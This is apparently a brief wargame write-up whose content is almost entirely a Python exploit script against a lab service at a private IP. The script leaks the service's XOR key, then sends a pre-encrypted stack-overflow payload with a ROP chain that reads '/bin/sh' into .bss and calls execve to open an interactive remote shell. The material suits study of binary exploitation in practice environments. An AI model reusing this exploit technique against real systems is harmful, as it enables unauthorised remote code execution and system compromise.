Partway through I wasted a bit of time fumbling around in an unrelated spot. I hear it's total hell from level03 onward, so we'll see how that goes...
```python
# SunKn0wn is the author's own helper module; judging by the calls used here
# (remote, p32, sleep, recvuntil, interactive) it wraps a pwntools-style API,
# with recvsend() being a custom "receive, then send" helper.
from SunKn0wn import *

r = remote('192.168.179.151', 20002)

# Addresses taken from the target binary
read_plt = 0x08048860
execve_plt = 0x080489b0
bss = 0x0804b420
pppr = 0x80499bd        # pop; pop; pop; ret gadget (clears three arguments)

############ get xor key ############
# The service XORs the submitted data with a 0x80-byte key.
# Encrypting 0x80 null bytes therefore returns the key itself.
r.recvsend('E')
r.send('\x80\x00\x00\x00')
r.send('\x00' * 0x80)
r.recvuntil('--]\n\x80\x00\x00\x00')
xorkey = r.recv(0x80)
print "[*]Get xor key success!"

############ payload ############
# Overflow the stack buffer, then chain read(0, bss, 8) -> execve(bss, 0, 0)
payload = 'A' * 0x20010
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)
payload += p32(execve_plt)
payload += 'AAAA'
payload += p32(bss)
payload += p32(0)
payload += p32(0)

# Pre-XOR the payload so that the server's "encryption" turns it back into the raw bytes
realpayload = ''
cnt = 0
for i in payload:
    realpayload += chr(ord(i) ^ ord(xorkey[cnt % 0x80]))
    cnt += 1

############ attack ############
r.recvsend('E')
r.send(p32(len(realpayload)))
r.send(realpayload)
sleep(0.2)
# 'Q' makes the handler return, so the overwritten return address starts the chain;
# the read() in the chain then takes "/bin/sh" into .bss for execve()
r.recvsend('Q')
r.send("/bin/sh\x00")
r.interactive()
```